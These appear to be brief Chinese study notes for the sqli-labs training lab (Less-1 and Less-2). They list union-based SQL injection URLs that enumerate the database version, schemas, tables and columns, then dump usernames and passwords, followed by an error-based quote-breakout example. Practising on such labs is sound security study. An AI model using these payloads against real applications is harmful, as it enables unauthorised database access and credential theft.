一、查询数据库的版本号
http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,2,version()
二、查询数据库中所有的库名
http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,2,group_concat(SCHEMA_NAME) from information_schema.schemata
三、查询当前库的所有表名
http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()
四、查询当前库中某一个表的所有列
http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users'h
五、查询当前库中某一个表的所有值
http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from security.users
127.0.0.1/Less-2/?id=-2 union select 1,2,group_concat(username, '-',password) from users
六、根据报错信息,
例:http://10.1.2.5:10631/sqli/Less-1/?id=1'
有用信息为:''1'' LIMIT 0,1'
1、最终代码
http://10.1.2.5:10631/sqli/Less-1/?id=1' union select 1,2,database() %23 ' LIMIT 0,1
其中id=1 1可写可不写
